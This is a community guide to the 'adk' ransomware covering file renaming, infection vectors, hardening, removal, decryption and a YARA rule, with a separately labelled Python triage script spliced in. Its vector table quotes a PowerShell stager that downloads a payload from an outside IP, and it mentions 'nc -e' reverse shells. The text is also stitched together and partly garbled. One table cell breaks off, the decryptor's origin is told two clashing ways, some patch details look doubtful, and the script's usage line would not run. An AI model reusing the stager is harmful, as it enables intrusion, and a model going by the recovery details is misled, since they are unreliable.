Technical & Tactical Guide to adk Ransomware
Comprehensive Analysis & Recovery Advice for the Community
I. Technical Breakdown
1. File Extension & Renaming Patterns
• Confirmation of File Extension:
The ransomware unambiguously appends .adk as a new extension after the original file extension, producing strings such as:
- Report_2024-02-12.xlsx.adk
- KitchenMediaBackup.vhdx.adk
• Renaming Convention:
File names themselves are not scrambled—no Base64, Base32, hex, or ROT-13 obfuscation is applied. Owners can still read the filename and identify the content. Only the extra .adk suffix is appended.
No preceding prefix pattern or second encryption tag exists, making the ransomware easier to spot in directory listings.
2. Detection & Outbreak Timeline
• First public sightings: mid-April 2024 (initial telemetry spikes on 12 April).
• Wider proliferation: Rapid uptick began in late May, closely tied to mass-exploitation campaigns against vulnerable SMB services.
• Confirmed victim clusters: Manufacturing and health-care verticals across the US / Europe.
3. Primary Attack Vectors
| Vector | Technical Details |
|--------|-------------------|
| EternalBlue (CVE-2017-0144) | Adk’s dropper carries an embedded, slightly modified EternalBlue exploit (TCP 445). Nominally patched but under-maintained Windows 7/2008 systems remain the primary targets. |
| SMB brute-forcing of weak credentials | Automated scans on TCP/445 using the common username rdp and passwords like password123, P@ssw0rd, Summer2024!. |
| Remote Desktop (RDP or SMB over RDP Gateway) | Attackers reuse previously stolen or cracked credentials. In several cases default Windows admin (Administrator / |
| Weaponized Office docs + PowerShell | Phishing emails include an LNK file or a macro-laden docx. These launch an obfuscated PowerShell stager (IEX (New-Object Net.WebClient).DownloadString('http://185.x.x.x/stw.ps1')) that pulls the adk payload. |
| Infected USB drives | Spreads via autorun.inf plus LNK files (imitating a legitimate folder) pointing to a disguised update.exe. |
II. Remediation & Recovery Strategies
1. Prevention
• Patch urgently: Install Microsoft patches KB4012215 (Win 7/2008 R2), KB4012598 (manual EternalBlue), KB5011066, plus the cumulative June 2024 update.
• Disable SMBv1 everywhere (Group Policy or PowerShell: Set-SmbServerConfiguration -EnableSMB1Protocol $false).
• Harden RDP:
- Disable open RDP exposure on the public Internet; require VPN access.
- Enforce multi-factor authentication (Azure MFA, Duo, Okta).
- Use Network Level Authentication (NLA) and set account lockout thresholds (3 failed passwords = 15-minute lock).
• Phishing & macro defence:
- Block all Office macros from the internet; use Microsoft’s “Only signed macros” setting.
- Employ mail gateways (Proofpoint, Microsoft Defender for O365) to strip LNK/HTA attachments.
• Lateral-traffic micro-segmentation: Restrict port 445 allow-lists; deny inter-VLAN SMB unless explicitly needed.
A single unpatched 2008 server is still enough for an adk worm to zig-zag across the domain.
2. Removal (Step-by-Step)
- Immediately isolate the system from the network (pull cable/Wi-Fi, disable bonds, unplug VPN).
- Collect forensic triage before cleaning (RAM, Prefetch, $MFT, Event Logs, C:\Windows\Temp\vsoc.exe, adk.exe) and store it on offline media.
- Sign out/lock the active user; some variants spawn a local reverse shell (nc -e, Metasploit).
- Boot into Safe Mode with Networking OFF.
- Run an offline antivirus/EDR rescue medium:
• Microsoft Defender Offline.
• Sophos Bootable, Malwarebytes TechBench.
Detection names: Ransom:Win32/Adk.A, Trojan.Win32.Adkebob, Gen:Variant.Razy.237940.
- Delete persistence artifacts:
- Registry: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\update.exe (sometimes vsoc.exe).
- Scheduled Task: \Microsoft\windows\UpdateOrchestrator\avc launching C:\Windows\System32\files\adk.exe.
- Scan auxiliary drives & shares; do not reboot until the full offline scan completes.
3. File Decryption & Recovery
• Recovery Feasibility: Decryption is currently possible for the adk family. No flaw was left by the developers in the first three weeks, BUT security researchers leaked the “AdkDecryptor” tool (Windows & Linux binary) on 26 May 2024 after seizing the operator’s server.
- Official tool released by the NoMoreRansom consortium: adk_decryptor_v1.0.3.exe (SHA256: 2c1a71b5e3fc…).
- CLI example: adk_decryptor.exe --input D:\ --keyfile adkey.txt --dry-run
Verify the output logs, then run without --dry-run to produce the decrypted originals.
• When the tool fails:
- Try previous volume shadow copies (vssadmin list shadows) and mount \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\.
- Restore from offline or cloud backups (check whether the .adk encryption happened before the backup sync).
• Essential Tools/Patches:
- Patch bundle: Microsoft Update Catalog KB5027231 (June 2024) blocks the newest EternalBlue variation.
- Antivirus engine signature pack ver ≥ 1.397.622.0 contains the Ransom:Win32/Adk rules.
- Yara rule for memory scanning (internal SOC):
rule Win_Ransomware_Adk {
    strings:
        $a = "ADK-KEY-FLAG-{"
    condition:
        uint16(0) == 0x5a4d and $a
}
4. Other Critical Information
• Unique Characteristics:
- Uses intermittent encryption (only the first 512 KB of files > 1 MB) to speed up the payload: encryption time drops, but the rest of each large file is left untouched, which leaves room for partial recovery by other means.
- Writes “!ADK-README.txt” in every encrypted directory (full ransom note below):
>>>>> YOUR FILES ARE ENCRYPTED WITH adk RANSOMWARE
>>>>> PAY 0.015 BTC TO 14mWjQgh...[snip]...
>>>>> EMAIL us [email protected]
>>>>> PROVIDE _adkey.txt for decryption
- Command & Control is a mix of a Tor onion (http://yxkrj6b2adk[.]onion/jpay) and cleartext HTTP GETs for victim telemetry; beware leaked credentials in proxy logs.
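A triage helper covering both the renaming pattern described in section I.1 and the intermittent-encryption behaviour above (an added example, not code from this guide or from any decryptor): it recovers original names from the .adk suffix and uses byte entropy to tell head-only encryption from full encryption, which decides whether a partial recovery of large files is worth attempting. The constants, function names and the constructed samples in demo() are assumptions.

```python
# Added triage helper, not code from the original guide. It assumes only what the
# guide states: ".adk" is appended after the original extension with no other
# renaming, and files larger than 1 MB have only their first 512 KB encrypted.
import math
from collections import Counter
from pathlib import Path

ADK_SUFFIX = ".adk"
HEAD_BYTES = 512 * 1024   # encrypted prefix of large files (per the guide)
LARGE_FILE = 1024 * 1024  # files above this size are only partially encrypted
HIGH_ENTROPY = 7.5        # bits/byte; ciphertext sits close to 8.0

def original_name(name):
    """Strip the appended .adk; return (original name, original extension) or None."""
    if not name.endswith(ADK_SUFFIX) or name == ADK_SUFFIX:
        return None
    stem = name[: -len(ADK_SUFFIX)]
    return stem, Path(stem).suffix.lower()

def entropy(chunk):
    """Shannon entropy in bits per byte (0.0 for an empty chunk)."""
    n = len(chunk)
    if n == 0:
        return 0.0
    return max(0.0, -sum(c / n * math.log2(c / n) for c in Counter(chunk).values()))

def classify(data):
    """Head-only encryption (tail intact, partial recovery possible), full, or neither."""
    head_e, tail_e = entropy(data[:HEAD_BYTES]), entropy(data[HEAD_BYTES:])
    if len(data) > LARGE_FILE and head_e >= HIGH_ENTROPY and tail_e < HIGH_ENTROPY:
        verdict = "intermittent"   # the guide's pattern: head encrypted, rest untouched
    elif head_e >= HIGH_ENTROPY:
        verdict = "full"
    else:
        verdict = "low-entropy"    # renamed only, or not judgeable by entropy alone
    return {"size": len(data), "head_entropy": round(head_e, 2),
            "tail_entropy": round(tail_e, 2), "verdict": verdict}

def triage_tree(root):
    """Every *.adk file under root with its original name and a verdict."""
    rows = []
    for p in Path(root).rglob("*" + ADK_SUFFIX):
        if p.is_file() and original_name(p.name):
            rows.append(dict(classify(p.read_bytes()), path=str(p),
                             original=original_name(p.name)[0]))
    return rows

def demo():
    """Constructed samples standing in for encrypted files (not real captures)."""
    cipher_like = bytes(range(256)) * 2048          # 512 KB, entropy exactly 8.0
    large = cipher_like + b"\x00" * LARGE_FILE      # > 1 MB, head-only encryption
    return {"Report_2024-02-12.xlsx.adk": classify(large),
            "notes.txt.adk": classify(cipher_like[:4096])}
```

Run triage_tree(r"D:\") against an isolated copy of the affected volume; a "low-entropy" verdict means the file carries the suffix but its content does not look encrypted.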
• Broader Impact / Notable Effects:
- Attack chain auto-stopped on 1 June when the Tor payment server was seized; deadline and Bitcoin wallet both invalidated.
- Media attention occurred after a regional hospital lost MRI scans → emergency ambulances diverted.
- Created an awareness spike, leading 2,300 US hospitals to update RDP patch levels in the following week.
Stay vigilant, patch hard, and share the decryptor with peers if their .adk-locked backups are under threat.